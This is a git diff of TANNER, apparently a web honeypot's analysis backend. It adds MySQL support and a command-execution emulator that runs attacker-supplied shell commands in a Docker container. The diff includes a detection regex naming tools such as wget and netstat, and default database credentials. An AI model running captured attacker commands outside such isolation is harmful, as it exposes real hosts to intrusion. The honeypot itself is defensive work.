diff --git a/.travis.yml b/.travis.yml
index 36c7bac7..4da78c04 100644
--- a/.travis.yml
+++ b/.travis.yml
@@ -1,3 +1,6 @@
+sudo: required
+services:
+ - docker
language: python
python:
- "3.5"
diff --git a/README.md b/README.md
index df7296df..a3527376 100644
--- a/README.md
+++ b/README.md
@@ -31,8 +31,12 @@ Getting Started
1. For PHP Sandbox setup, see sandbox [manual] (https://github.com/mushorg/phpox)
2. In PHP Sandbox directory, run sandbox: ``sudo python3 sandbox.py``
+### Setup Docker
+1. Install [docker](https://docs.docker.com/engine/installation/linux/ubuntu/)
+2. Pull the required image to use [default : ``busybox:latest``]
+
### Setup and run TANNER
diff --git a/bin/tanner b/bin/tanner
index 24ad4c46..8c8b6bef 100644
--- a/bin/tanner
+++ b/bin/tanner
@@ -28,7 +28,8 @@ def main():
print("Error logs will be stored in", error_log_file_name)
if TannerConfig.get('LOCALLOG', 'enabled') == 'True':
print("Data logs will be stored in", TannerConfig.get('LOCALLOG', 'PATH'))
- tanner.server.run_server()
+ tanner = server.TannerServer()
+ tanner.start()
if __name__ == "__main__":
diff --git a/docs/source/config.rst b/docs/source/config.rst
index 1895fab8..ed4e6f75 100644
--- a/docs/source/config.rst
+++ b/docs/source/config.rst
@@ -23,8 +23,16 @@ There are 8 different sections :
:root_dir: The root directory for emulators that need data storing such as SQLI and LFI. Data will be stored in this directory
* **SQLI**
-
+
:db_name: THe name of database used in SQLI emulator
+ :type: Supports two types MySQL/SQLITE
+ :db_name: The name of database used in SQLI emulator
+ :host: This will be used for MySQL to get the host address
+ :user: This is the MySQL user which perform DB queries
+ :password: The password corresponding to the above user
+ * **CMD_EXEC**
+
+ :host_image: The image which emulates commands in Command Execution Emulator
* **LOGGER**
:log_file: Location of tanner log file
@@ -47,7 +55,8 @@ If no file is specified, following json will be used as default:
'TANNER': {'host': '0.0.0.0', 'port': 8090},
'REDIS': {'host': 'localhost', 'port': 6379, 'poolsize': 80, 'timeout': 1},
'EMULATORS': {'root_dir': '/opt/tanner'},
- 'SQLI': {'db_name': 'tanner.db'},
+ 'SQLI': {'type':'SQLITE', 'db_name': 'tanner_db', 'host':'localhost', 'user':'root', 'password':'user_pass'},
+ 'CMD_EXEC': {'host_image': 'busybox:latest'},
'LOGGER': {'log_file': '/opt/tanner/tanner.log'},
'MONGO': {'enabled': 'False', 'URI': 'mongodb://localhost'},
'LOCALLOG': {'enabled': 'False', 'PATH': '/tmp/tanner_report.json'}
diff --git a/docs/source/emulators.rst b/docs/source/emulators.rst
index ecb58727..7ef38c9f 100644
--- a/docs/source/emulators.rst
+++ b/docs/source/emulators.rst
@@ -81,6 +81,24 @@ It emulates `SQL injection`_ vulnerability. This attack is detected by ``libinje
The emulator copies the original database (see :doc:`db_setup` for more info about db) to a dummy database for every attacker.
It uses UUID of the session for the attacker's db name. Every query is executed on the attacker's db.
The emulator returns the result of the execution and the page where SNARE should show the result.
+It supports two types of DBs.
+* **SQLITE**
+ To enable it, set SQLI type to SQLITE in config
+* **MySQL**
+ To enable it, set SQLI type to MySQL in config and set other necessary fields - Host, User and Password
+
+Command Execution Emulator
+~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+It emulates `Command Execution`_ vulnerability. This attack is detected with pattern.
+
+::
+
+.*(alias|cat|cd|cp|echo|exec|find|for|grep|ifconfig|ls|man|mkdir|netstat|ping|ps|pwd|uname|wget|touch|while).*
+
+* Each param value is checked against the pattern and ``command`` is extracted.
+* The ``command`` is executed in a docker container safely.
+* Results from container is injected into the index page.
.. _RFI: https://en.wikipedia.org/wiki/File_inclusion_vulnerability#Remote_File_Inclusion
@@ -88,4 +106,5 @@ The emulator returns the result of the execution and the page where SNARE should
.. _LFI: https://en.wikipedia.org/wiki/File_inclusion_vulnerability#Local_File_Inclusion
.. _XSS: https://en.wikipedia.org/wiki/Cross-site_scripting
.. _SQL injection: https://en.wikipedia.org/wiki/SQL_injection
+.. _Command Execution: https://www.owasp.org/index.php/Command_Injection
.. _manual: https://github.com/client9/libinjection/wiki/doc-sqli-python
\ No newline at end of file
diff --git a/requirements.txt b/requirements.txt
index caade11d..17cdf731 100644
--- a/requirements.txt
+++ b/requirements.txt
@@ -1,5 +1,7 @@
-aiohttp<2.0
-elizabeth
+aiohttp>=2.0
+aiomysql
+docker
+elizabeth==0.3.27
yarl
redis
asyncio_redis
diff --git a/tanner/api.py b/tanner/api.py
index 6f546026..948eb5ce 100644
--- a/tanner/api.py
+++ b/tanner/api.py
@@ -1,7 +1,5 @@
-import asyncio
import json
import logging
-from urllib.parse import urlparse, parse_qs
import asyncio_redis
@@ -10,34 +8,28 @@ class Api:
def __init__(self):
self.logger = logging.getLogger('tanner.api.Api')
- @asyncio.coroutine
- def handle_api_request(self, path, redis_client):
+ async def handle_api_request(self, query, params, redis_client):
result = None
- parsed_path = urlparse(path)
- query = parse_qs(parsed_path.query)
-
- if parsed_path.path.startswith('/api/stats') and not query:
- result = yield from self.return_stats(redis_client)
- elif parsed_path.path == '/api/stats' and 'uuid' in query:
- result = yield from self.return_uuid_stats(query['uuid'], redis_client, 50)
+ if query == 'stats' and not params:
+ result = await self.return_stats(redis_client)
+ elif query == 'stats' and 'uuid' in params:
+ result = await self.return_uuid_stats(params['uuid'], redis_client, 50)
return result
- @asyncio.coroutine
- def return_stats(self, redis_client):
+ async def return_stats(self, redis_client):
query_res = []
try:
- query_res = yield from redis_client.smembers('snare_ids')
- query_res = yield from query_res.asset()
+ query_res = await redis_client.smembers('snare_ids')
+ query_res = await query_res.asset()
except asyncio_redis.NotConnectedError as connection_error:
self.logger.error('Can not connect to redis %s', connection_error)
return list(query_res)
- @asyncio.coroutine
- def return_uuid_stats(self, uuid, redis_client, count=-1):
+ async def return_uuid_stats(self, uuid, redis_client, count=-1):
query_res = []
try:
- query_res = yield from redis_client.lrange_aslist(uuid[0], 0, count)
+ query_res = await redis_client.lrange_aslist(uuid, 0, count)
except asyncio_redis.NotConnectedError as connection_error:
self.logger.error('Can not connect to redis %s', connection_error)
else:
diff --git a/tanner/config.py b/tanner/config.py
index 33410f4f..bcf3307d 100644
--- a/tanner/config.py
+++ b/tanner/config.py
@@ -10,7 +10,8 @@
'TANNER': {'host': '0.0.0.0', 'port': 8090},
'REDIS': {'host': 'localhost', 'port': 6379, 'poolsize': 80, 'timeout': 1},
'EMULATORS': {'root_dir': '/opt/tanner'},
- 'SQLI': {'db_name': 'tanner.db'},
+ 'SQLI': {'type':'SQLITE', 'db_name': 'tanner_db', 'host':'localhost', 'user':'root', 'password':'user_pass'},
+ 'CMD_EXEC': {'host_image': 'busybox:latest'},
'LOGGER': {'log_debug': '/opt/tanner/tanner.log', 'log_err': '/opt/tanner/tanner.err'},
'MONGO': {'enabled': 'False', 'URI': 'mongodb://localhost'},
'LOCALLOG': {'enabled': 'False', 'PATH': '/tmp/tanner_report.json'},
diff --git a/tanner/dorks_manager.py b/tanner/dorks_manager.py
index e550af89..4b388aba 100644
--- a/tanner/dorks_manager.py
+++ b/tanner/dorks_manager.py
@@ -1,16 +1,16 @@
-import asyncio
import logging
+import math
import os
import pickle
import random
import re
import uuid
-import math
import asyncio_redis
-from tanner.utils import patterns
from tanner import config
+from tanner.utils import patterns
+
class DorksManager:
dorks_key = uuid.uuid3(uuid.NAMESPACE_DNS, 'dorks').hex
@@ -21,8 +21,7 @@ def __init__(self):
self.init_done = False
@staticmethod
- @asyncio.coroutine
- def push_init_dorks(file_name, redis_key, redis_client):
+ async def push_init_dorks(file_name, redis_key, redis_client):
dorks = None
if os.path.exists(file_name):
with open(file_name, 'rb') as dorks_file:
@@ -32,57 +31,54 @@ def push_init_dorks(file_name, redis_key, redis_client):
dorks = dorks.split()
if isinstance(dorks, set):
dorks = [x for x in dorks if x is not None]
- yield from redis_client.sadd(redis_key, dorks)
+ await redis_client.sadd(redis_key, dorks)
- @asyncio.coroutine
- def extract_path(self, path, redis_client):
+ async def extract_path(self, path, redis_client):
extracted = re.match(patterns.QUERY, path)
if extracted:
extracted = extracted.group(0)
-
try:
- yield from redis_client.sadd(self.user_dorks_key, [extracted])
+ await redis_client.sadd(self.user_dorks_key, [extracted])
except asyncio_redis.NotConnectedError as connection_error:
- self.logger('Problem with redis connection: %s', connection_error)
+ self.logger.error('Problem with redis connection: %s', connection_error)
- @asyncio.coroutine
- def init_dorks(self, redis_client):
+ async def init_dorks(self, redis_client):
try:
- transaction = yield from redis_client.multi()
- dorks_exist = yield from transaction.exists(self.dorks_key)
- user_dorks_exist = yield from transaction.exists(self.user_dorks_key)
+ transaction = await redis_client.multi()
+ dorks_exist = await transaction.exists(self.dorks_key)
+ user_dorks_exist = await transaction.exists(self.user_dorks_key)
- yield from transaction.exec()
+ await transaction.exec()
except (asyncio_redis.TransactionError, asyncio_redis.NotConnectedError) as redis_error:
- self.logger('Problem with transaction: %s', redis_error)
+ self.logger.error('Problem with transaction: %s', redis_error)
else:
- dorks_existed = yield from dorks_exist
- user_dorks_existed = yield from user_dorks_exist
+ dorks_existed = await dorks_exist
+ user_dorks_existed = await user_dorks_exist
if not dorks_existed:
- yield from self.push_init_dorks(config.TannerConfig.get('DATA', 'dorks'), self.dorks_key, redis_client)
+ await self.push_init_dorks(config.TannerConfig.get('DATA', 'dorks'), self.dorks_key, redis_client)
if not user_dorks_existed:
- yield from self.push_init_dorks(config.TannerConfig.get('DATA', 'user_dorks'), self.user_dorks_key, redis_client)
+ await self.push_init_dorks(config.TannerConfig.get('DATA', 'user_dorks'), self.user_dorks_key,
+ redis_client)
self.init_done = True
- @asyncio.coroutine
- def choose_dorks(self, redis_client):
+ async def choose_dorks(self, redis_client):
if not self.init_done:
- yield from self.init_dorks(redis_client)
+ await self.init_dorks(redis_client)
chosen_dorks = []
max_dorks = 50
try:
- transaction = yield from redis_client.multi()
- dorks = yield from transaction.smembers_asset(self.dorks_key)
- user_dorks = yield from transaction.smembers_asset(self.user_dorks_key)
+ transaction = await redis_client.multi()
+ dorks = await transaction.smembers_asset(self.dorks_key)
+ user_dorks = await transaction.smembers_asset(self.user_dorks_key)
- yield from transaction.exec()
+ await transaction.exec()
except (asyncio_redis.TransactionError, asyncio_redis.NotConnectedError) as redis_error:
- self.logger('Problem with transaction: %s', redis_error)
+ self.logger.error('Problem with transaction: %s', redis_error)
else:
- dorks = yield from dorks
- user_dorks = yield from user_dorks
+ dorks = await dorks
+ user_dorks = await user_dorks
chosen_dorks.extend(random.sample(dorks, random.randint(math.floor(0.5 * max_dorks), max_dorks)))
try:
if max_dorks > len(user_dorks):
diff --git a/tanner/emulators/base.py b/tanner/emulators/base.py
index 3b736e76..d0ebcf83 100644
--- a/tanner/emulators/base.py
+++ b/tanner/emulators/base.py
@@ -3,7 +3,7 @@
import urllib.parse
import yarl
-from tanner.emulators import lfi, rfi, sqli, xss
+from tanner.emulators import lfi, rfi, sqli, xss, cmd_exec
from tanner.utils import patterns
@@ -15,29 +15,34 @@ class BaseHandler:
patterns.XSS_ATTACK: dict(name='xss', order=3)
}
- def __init__(self, base_dir, db_name):
+ def __init__(self, base_dir, db_name, loop=None):
self.emulators = {
- 'rfi': rfi.RfiEmulator(base_dir),
+ 'rfi': rfi.RfiEmulator(base_dir, loop),
'lfi': lfi.LfiEmulator(base_dir),
'xss': xss.XssEmulator(),
- 'sqli': sqli.SqliEmulator(db_name, base_dir)
+ 'sqli': sqli.SqliEmulator(db_name, base_dir),
+ 'cmd_exec': cmd_exec.CmdExecEmulator()
}
- @asyncio.coroutine
- def handle_post(self, session, data):
+ async def handle_post(self, session, data):
detection = dict(name='unknown', order=0)
- xss_result = yield from self.emulators['xss'].handle(None, session, data)
+ xss_result = await self.emulators['xss'].handle(None, session, data)
if xss_result:
detection = {'name': 'xss', 'order': 2, 'payload': xss_result}
else:
- sqli_data = yield from self.emulators['sqli'].check_post_data(data)
+ sqli_data = self.emulators['sqli'].check_post_data(data)
if sqli_data:
- sqli_result = yield from self.emulators['sqli'].handle(sqli_data, session, 1)
+ sqli_result = await self.emulators['sqli'].handle(sqli_data, session, 1)
detection = {'name': 'sqli', 'order': 2, 'payload': sqli_result}
+ else:
+ cmd_exec_data = await self.emulators['cmd_exec'].check_post_data(data)
+ if cmd_exec_data:
+ cmd_exec_results = await self.emulators['cmd_exec'].handle(cmd_exec_data[0][1], session)
+ detection = {'name': 'cmd_exec', 'order': 3, 'payload': cmd_exec_results}
+
return detection
- @asyncio.coroutine
- def handle_get(self, session, path):
+ async def handle_get(self, session, path):
detection = dict(name='unknown', order=0)
# dummy for wp-content
if re.match(patterns.WORD_PRESS_CONTENT, path):
@@ -56,27 +61,30 @@ def handle_get(self, session, path):
attack_value = value
if detection['order'] <= 1:
- sqli = yield from self.emulators['sqli'].check_get_data(path)
- if sqli:
- detection = {'name': 'sqli', 'order': 2}
- attack_value = path
+ cmd_exec = await self.emulators['cmd_exec'].check_get_data(path)
+ if cmd_exec:
+ detection = {'name': 'cmd_exec', 'order': 3}
+ attack_value = cmd_exec[0][1]
+ else:
+ sqli = self.emulators['sqli'].check_get_data(path)
+ if sqli:
+ detection = {'name': 'sqli', 'order': 2}
+ attack_value = path
if detection['name'] in self.emulators:
- emulation_result = yield from self.emulators[detection['name']].handle(attack_value, session)
+ emulation_result = await self.emulators[detection['name']].handle(attack_value, session)
detection['payload'] = emulation_result
return detection
- @asyncio.coroutine
- def emulate(self, data, session, path):
+ async def emulate(self, data, session, path):
if data['method'] == 'POST':
- detection = yield from self.handle_post(session, data)
+ detection = await self.handle_post(session, data)
else:
- detection = yield from self.handle_get(session, path)
+ detection = await self.handle_get(session, path)
return detection
- @asyncio.coroutine
- def handle(self, data, session, path):
- detection = yield from self.emulate(data, session, path)
+ async def handle(self, data, session, path):
+ detection = await self.emulate(data, session, path)
return detection
diff --git a/tanner/emulators/cmd_exec.py b/tanner/emulators/cmd_exec.py
new file mode 100644
index 00000000..c6634f96
--- /dev/null
+++ b/tanner/emulators/cmd_exec.py
@@ -0,0 +1,93 @@
+import asyncio
+import docker
+import yarl
+# TODO : Replace docker with aiodocker
+import logging
+
+from tanner.config import TannerConfig
+from tanner.utils import patterns
+
+class CmdExecEmulator:
+ def __init__(self):
+ try:
+ self.docker_client = docker.from_env(version='auto')
+ except docker.errors as docker_error:
+ self.logger.error('Error while connecting to docker service %s', docker_error)
+ self.host_image = TannerConfig.get('CMD_EXEC', 'host_image')
+ self.logger = logging.getLogger('tanner.cmd_exec_emulator.CmdExecEmulator')
+
+ async def setup_host_image(self):
+ try:
+ if not self.docker_client.images.list(self.host_image):
+ self.docker_client.images.pull(self.host_image)
+ except docker.errors as docker_error:
+ self.logger.error('Error while pulling %s image %s', self.host_image, docker_error)
+
+ async def get_container(self, container_name):
+ container = None
+ try:
+ container_if_exists = self.docker_client.containers.list(all= True,
+ filters= dict(name= container_name)
+ )
+ if container_if_exists:
+ container = container_if_exists[0]
+ except docker.errors.APIError as server_error:
+ self.logger.error('Error while fetching container list %s', server_error)
+ return container
+
+ async def create_attacker_env(self, session):
+ await self.setup_host_image()
+ container_name = 'attacker_' + session.sess_uuid.hex
+ container = await self.get_container(container_name)
+ if not container:
+ try:
+ container = self.docker_client.containers.create(image= self.host_image,
+ stdin_open= True,
+ name= container_name
+ )
+ session.associate_env(container_name)
+ except docker.errors as docker_error:
+ self.logger.error('Error while creating a container %s', docker_error)
+ return container
+
+ async def get_cmd_exec_results(self, container, cmd):
+ execute_result = None
+ try:
+ container.start()
+ execute_result = container.exec_run(['sh', '-c', cmd]).decode('utf-8')
+ container.kill()
+ except docker.errors.APIError as server_error:
+ self.logger.error('Error while executing command %s in container %s', cmd, server_error)
+ result = dict(value= execute_result, page= '/index.html')
+ return result
+
+ async def delete_env(self, container_name):
+ container = await self.get_container(container_name)
+ try:
+ if container:
+ container.remove(force = True)
+ except docker.errors.APIError as server_error:
+ self.logger.error('Error while removing container %s', server_error)
+
+ async def check_post_data(self, data):
+ cmd_data = []
+ for (param_id, param_value) in data['post_data'].items():
+ if patterns.CMD_ATTACK.match(param_value):
+ cmd_data.append((param_id, param_value))
+ return cmd_data
+
+ async def check_get_data(self, path):
+ cmd_data = []
+ query = yarl.URL(path).query_string
+ params = query.split('&')
+ for param in params:
+ if len(param.split('=')) == 2:
+ param_id, param_value = param.split('=')
+ if patterns.CMD_ATTACK.match(param_value):
+ cmd_data.append((param_id, param_value))
+ return cmd_data
+
+ async def handle(self, value, session= None):
+ container = await self.create_attacker_env(session)
+ result = await self.get_cmd_exec_results(container, value)
+ return result
\ No newline at end of file
diff --git a/tanner/emulators/lfi.py b/tanner/emulators/lfi.py
index 2860f46f..9a154327 100644
--- a/tanner/emulators/lfi.py
+++ b/tanner/emulators/lfi.py
@@ -13,13 +13,11 @@ def __init__(self, root_path):
self.whitelist = []
self.setup_or_update_vdocs()
- @asyncio.coroutine
def available_files(self):
for root, dirs, files in os.walk(self.vdoc_path):
for filename in files:
self.whitelist.append(os.path.join(root, filename))
- @asyncio.coroutine
def get_lfi_result(self, file_path):
result = None
if file_path in self.whitelist:
@@ -27,7 +25,6 @@ def get_lfi_result(self, file_path):
result = lfile.read()
return result
- @asyncio.coroutine
def get_file_path(self, path):
file_match = re.match(patterns.LFI_FILEPATH, path)
if file_match:
@@ -43,20 +40,20 @@ def setup_or_update_vdocs(self):
os.makedirs(self.vdoc_path)
with open(config.TannerConfig.get('DATA', 'vdocs')) as vdf:
- vdocs = json.load(vdf)
+ vdocs = json.load(vdf)
if vdocs:
for key, value in vdocs.items():
filename = os.path.join(self.vdoc_path, key)
if not os.path.exists(filename):
- os.makedirs(os.path.dirname(filename), exist_ok=True)
- with open(filename, 'w') as vd:
- vd.write(value)
+ os.makedirs(os.path.dirname(filename), exist_ok=True)
+ with open(filename, 'w') as vd:
+ vd.write(value)
- @asyncio.coroutine
- def handle(self, path, session=None):
+
+ async def handle(self, path, session=None):
if not self.whitelist:
- yield from self.available_files()
- file_path = yield from self.get_file_path(path)
- result = yield from self.get_lfi_result(file_path)
+ self.available_files()
+ file_path = self.get_file_path(path)
+ result = self.get_lfi_result(file_path)
return result
diff --git a/tanner/emulators/mysqli.py b/tanner/emulators/mysqli.py
new file mode 100644
index 00000000..bf55ca84
--- /dev/null
+++ b/tanner/emulators/mysqli.py
@@ -0,0 +1,39 @@
+import asyncio
+
+from tanner.utils import mysql_db_helper
+from tanner import config
+
+
+class MySQLIEmulator:
+ def __init__(self, db_name):
+ self.db_name = db_name
+ self.helper = mysql_db_helper.MySQLDBHelper()
+
+ async def setup_db(self, query_map):
+ db_exists = await self.helper.check_db_exists(self.db_name)
+ if not db_exists:
+ await self.helper.setup_db_from_config(self.db_name)
+ query_map = await self.helper.create_query_map(self.db_name)
+ return query_map
+
+ async def create_attacker_db(self, session):
+ attacker_db_name = 'attacker_' + session.sess_uuid.hex
+ attacker_db = await self.helper.copy_db(self.db_name,
+ attacker_db_name
+ )
+ session.associate_db(attacker_db)
+ return attacker_db
+
+ async def execute_query(self, query, db_name):
+ result = []
+ conn = await self.helper.connect_to_db()
+ cursor = await conn.cursor()
+ await cursor.execute('USE {db_name}'.format(db_name=db_name))
+ try:
+ await cursor.execute(query)
+ rows = await cursor.fetchall()
+ for row in rows:
+ result.append(list(row))
+ except Exception as mysql_error:
+ result = str(mysql_error)
+ return result
\ No newline at end of file
diff --git a/tanner/emulators/rfi.py b/tanner/emulators/rfi.py
index d772a24a..1fa95487 100644
--- a/tanner/emulators/rfi.py
+++ b/tanner/emulators/rfi.py
@@ -1,24 +1,25 @@
import asyncio
+import ftplib
import hashlib
import logging
import os
import re
import time
-import ftplib
from concurrent.futures import ThreadPoolExecutor
import aiohttp
import yarl
+
from tanner.utils import patterns
class RfiEmulator:
- def __init__(self, root_dir):
+ def __init__(self, root_dir, loop=None):
+ self._loop = loop if loop is not None else asyncio.get_event_loop()
self.script_dir = os.path.join(root_dir, 'files')
self.logger = logging.getLogger('tanner.rfi_emulator.RfiEmulator')
- @asyncio.coroutine
- def download_file(self, path):
+ async def download_file(self, path):
file_name = None
url = re.match(patterns.REMOTE_FILE_URL, path)
@@ -32,20 +33,19 @@ def download_file(self, path):
if url.scheme == "ftp":
pool = ThreadPoolExecutor()
- loop = asyncio.get_event_loop()
- ftp_future = loop.run_in_executor(pool, self.download_file_ftp, url)
- file_name = yield from ftp_future
+ ftp_future = self._loop.run_in_executor(pool, self.download_file_ftp, url)
+ file_name = await ftp_future
else:
try:
- with aiohttp.ClientSession() as client:
- resp = yield from client.get(url)
- data = yield from resp.text()
+ with aiohttp.ClientSession(loop=self._loop) as client:
+ resp = await client.get(url)
+ data = await resp.text()
except aiohttp.ClientError as client_error:
self.logger.error('Error during downloading the rfi script %s', client_error)
else:
- yield from resp.release()
- yield from client.close()
+ await resp.release()
+ await client.close()
tmp_filename = url.name + str(time.time())
file_name = hashlib.md5(tmp_filename.encode('utf-8')).hexdigest()
with open(os.path.join(self.script_dir, file_name), 'bw') as rfile:
@@ -70,29 +70,28 @@ def download_file_ftp(self, url):
else:
return file_name
- @asyncio.coroutine
- def get_rfi_result(self, path):
+ async def get_rfi_result(self, path):
rfi_result = None
- yield from asyncio.sleep(1)
- file_name = yield from self.download_file(path)
+ await asyncio.sleep(1, loop=self._loop)
+ file_name = await self.download_file(path)
if file_name is None:
return rfi_result
with open(os.path.join(self.script_dir, file_name), 'br') as script:
script_data = script.read()
try:
- with aiohttp.ClientSession() as session:
- resp = yield from session.post('http://127.0.0.1:8088/', data=script_data)
- rfi_result = yield from resp.json()
+ with aiohttp.ClientSession(loop=self._loop) as session:
+
+ resp = await session.post('http://127.0.0.1:8088/', data=script_data)
+ rfi_result = await resp.json()
except aiohttp.ClientError as client_error:
self.logger.error('Error during connection to php sandbox %s', client_error)
else:
- yield from resp.release()
- yield from session.close()
+ await resp.release()
+ await session.close()
return rfi_result
- @asyncio.coroutine
- def handle(self, path, session=None):
- result = yield from self.get_rfi_result(path)
+ async def handle(self, path, session=None):
+ result = await self.get_rfi_result(path)
if not result or 'stdout' not in result:
return ''
else:
diff --git a/tanner/emulators/sqli.py b/tanner/emulators/sqli.py
index a2d085b7..43534ac6 100644
--- a/tanner/emulators/sqli.py
+++ b/tanner/emulators/sqli.py
@@ -1,30 +1,20 @@
-import asyncio
import os
+import pylibinjection
import sqlite3
import urllib.parse
-import pylibinjection
-from asyncio.subprocess import PIPE
-
-from tanner.utils import db_helper
-from tanner import config
+from tanner.utils import sqlite_db_helper
+from tanner.config import TannerConfig
+from tanner.emulators import mysqli, sqlite
class SqliEmulator:
def __init__(self, db_name, working_dir):
- self.db_name = db_name
- self.working_dir = os.path.join(working_dir, 'db/')
- self.helper = db_helper.DBHelper()
- self.query_map = None
+ if (TannerConfig.get('SQLI', 'type') == 'MySQL'):
+ self.sqli_emulator = mysqli.MySQLIEmulator(db_name)
+ else:
+ self.sqli_emulator = sqlite.SQLITEEmulator(db_name, working_dir)
- @asyncio.coroutine
- def setup_db(self):
- if not os.path.exists(self.working_dir):
- os.makedirs(self.working_dir)
- db = os.path.join(self.working_dir, self.db_name)
- if not os.path.exists(db):
- yield from self.helper.setup_db_from_config(self.working_dir, self.db_name)
- if self.query_map is None:
- self.query_map = yield from self.helper.create_query_map(self.working_dir, self.db_name)
+ self.query_map = None
@staticmethod
def check_sqli(path):
@@ -32,7 +22,6 @@ def check_sqli(path):
sqli = pylibinjection.detect_sqli(payload)
return int(sqli['sqli'])
- @asyncio.coroutine
def check_post_data(self, data):
sqli_data = []
for (param, value) in data['post_data'].items():
@@ -41,7 +30,6 @@ def check_post_data(self, data):
sqli_data.append((param, value))
return sqli_data
- @asyncio.coroutine
def check_get_data(self, path):
request_query = urllib.parse.urlparse(path).query
parsed_queries = urllib.parse.parse_qsl(request_query)
@@ -49,23 +37,12 @@ def check_get_data(self, path):
sqli = self.check_sqli(query[1])
return sqli
- @asyncio.coroutine
- def create_attacker_db(self, session):
- attacker_db_name = session.sess_uuid.hex + '.db'
- attacker_db = yield from self.helper.copy_db(self.db_name,
- attacker_db_name,
- self.working_dir
- )
- session.associate_db(attacker_db)
- return attacker_db
-
@staticmethod
def prepare_get_query(path):
query = urllib.parse.urlparse(path).query
parsed_query = urllib.parse.parse_qsl(query)
return parsed_query
- @asyncio.coroutine
def map_query(self, query):
db_query = None
param = query[0][0]
@@ -84,37 +61,24 @@ def map_query(self, query):
return db_query
- @staticmethod
- def execute_query(query, db):
- result = []
- conn = sqlite3.connect(db)
- cursor = conn.cursor()
- try:
- for row in cursor.execute(query):
- result.append(list(row))
- except sqlite3.OperationalError as sqlite_error:
- result = str(sqlite_error)
- return result
-
- @asyncio.coroutine
- def get_sqli_result(self, query, attacker_db):
- db_query = yield from self.map_query(query)
+ async def get_sqli_result(self, query, attacker_db):
+ db_query = self.map_query(query)
if db_query is None:
result = 'You have an error in your SQL syntax; check the manual\
that corresponds to your MySQL server version for the\
right syntax to use near {} at line 1'.format(query[0][0])
else:
- execute_result = self.execute_query(db_query, attacker_db)
+ execute_result = await self.sqli_emulator.execute_query(db_query, attacker_db)
if isinstance(execute_result, list):
execute_result = ' '.join([str(x) for x in execute_result])
result = dict(value=execute_result, page='/index.html')
return result
- @asyncio.coroutine
- def handle(self, path, session, post_request=0):
- yield from self.setup_db()
+ async def handle(self, path, session, post_request=0):
+ if self.query_map is None:
+ self.query_map = await self.sqli_emulator.setup_db(self.query_map)
if not post_request:
path = self.prepare_get_query(path)
- attacker_db = yield from self.create_attacker_db(session)
- result = yield from self.get_sqli_result(path, attacker_db)
+ attacker_db = await self.sqli_emulator.create_attacker_db(session)
+ result = await self.get_sqli_result(path, attacker_db)
return result
diff --git a/tanner/emulators/sqlite.py b/tanner/emulators/sqlite.py
new file mode 100644
index 00000000..73387a8e
--- /dev/null
+++ b/tanner/emulators/sqlite.py
@@ -0,0 +1,42 @@
+import asyncio
+import os
+import sqlite3
+
+from tanner.utils import sqlite_db_helper
+from tanner import config
+
+
+class SQLITEEmulator:
+ def __init__(self, db_name, working_dir):
+ self.db_name = db_name
+ self.working_dir = os.path.join(working_dir, 'db/')
+ self.helper = sqlite_db_helper.SQLITEDBHelper()
+
+ async def setup_db(self, query_map):
+ if not os.path.exists(self.working_dir):
+ os.makedirs(self.working_dir)
+ db = os.path.join(self.working_dir, self.db_name)
+ if not os.path.exists(db):
+ await self.helper.setup_db_from_config(self.working_dir, self.db_name)
+ query_map = self.helper.create_query_map(self.working_dir, self.db_name)
+ return query_map
+
+ async def create_attacker_db(self, session):
+ attacker_db_name = 'attacker_' + session.sess_uuid.hex
+ attacker_db = self.helper.copy_db(self.db_name,
+ attacker_db_name,
+ self.working_dir
+ )
+ session.associate_db(attacker_db)
+ return attacker_db
+
+ async def execute_query(self, query, db):
+ result = []
+ conn = sqlite3.connect(db)
+ cursor = conn.cursor()
+ try:
+ for row in cursor.execute(query):
+ result.append(list(row))
+ except sqlite3.OperationalError as sqlite_error:
+ result = str(sqlite_error)
+ return result
\ No newline at end of file
diff --git a/tanner/emulators/xss.py b/tanner/emulators/xss.py
index b6f56c2d..c6efd323 100644
--- a/tanner/emulators/xss.py
+++ b/tanner/emulators/xss.py
@@ -1,4 +1,3 @@
-import asyncio
import mimetypes
import re
import urllib.parse
@@ -8,7 +7,6 @@
class XssEmulator:
@staticmethod
- @asyncio.coroutine
def extract_xss_data(data):
value = ''
if 'post_data' in data:
@@ -19,12 +17,11 @@ def extract_xss_data(data):
value += val if not value else '\n' + val
return value
- @asyncio.coroutine
def get_xss_result(self, session, val):
result = None
injectable_page = None
if session:
- injectable_page = yield from self.set_xss_page(session)
+ injectable_page = self.set_xss_page(session)
if injectable_page is None:
injectable_page = '/index.html'
if val:
@@ -33,7 +30,6 @@ def get_xss_result(self, session, val):
return result
@staticmethod
- @asyncio.coroutine
def set_xss_page(session):
injectable_page = None
for page in reversed(session.paths):
@@ -41,10 +37,9 @@ def set_xss_page(session):
injectable_page = page['path']
return injectable_page
- @asyncio.coroutine
- def handle(self, value, session, raw_data=None):
+ async def handle(self, value, session, raw_data=None):
xss_result = None
if not value:
- value = yield from self.extract_xss_data(raw_data)
- xss_result = yield from self.get_xss_result(session, value)
+ value = self.extract_xss_data(raw_data)
+ xss_result = self.get_xss_result(session, value)
return xss_result
diff --git a/tanner/redis_client.py b/tanner/redis_client.py
new file mode 100644
index 00000000..cff11085
--- /dev/null
+++ b/tanner/redis_client.py
@@ -0,0 +1,25 @@
+import asyncio
+import logging
+
+import asyncio_redis
+
+from tanner.config import TannerConfig
+
+LOGGER = logging.getLogger(__name__)
+
+
+class RedisClient:
+ @staticmethod
+ async def get_redis_client():
+ redis_client = None
+ try:
+ host = TannerConfig.get('REDIS', 'host')
+ port = TannerConfig.get('REDIS', 'port')
+ poolsize = TannerConfig.get('REDIS', 'poolsize')
+ timeout = TannerConfig.get('REDIS', 'timeout')
+ redis_client = await asyncio.wait_for(asyncio_redis.Pool.create(
+ host=host, port=int(port), poolsize=int(poolsize)), timeout=int(timeout))
+ except asyncio.TimeoutError as timeout_error:
+ LOGGER.error('Problem with redis connection. Please, check your redis server. %s', timeout_error)
+ exit()
+ return redis_client
\ No newline at end of file
diff --git a/tanner/server.py b/tanner/server.py
index 2d9c0cbc..99815b2a 100644
--- a/tanner/server.py
+++ b/tanner/server.py
@@ -1,141 +1,108 @@
-#!/usr/bin/python3
-
import asyncio
import json
import logging
-from urllib.parse import unquote
-import aiohttp
-import aiohttp.server
-import asyncio_redis
import uvloop
+import yarl
+from aiohttp import web
-from tanner import api, dorks_manager, session_manager, config
+from tanner import api, dorks_manager, session_manager, redis_client
+from tanner.config import TannerConfig
from tanner.emulators import base
from tanner.reporting.log_local import Reporting as local_report
from tanner.reporting.log_mongodb import Reporting as mongo_report
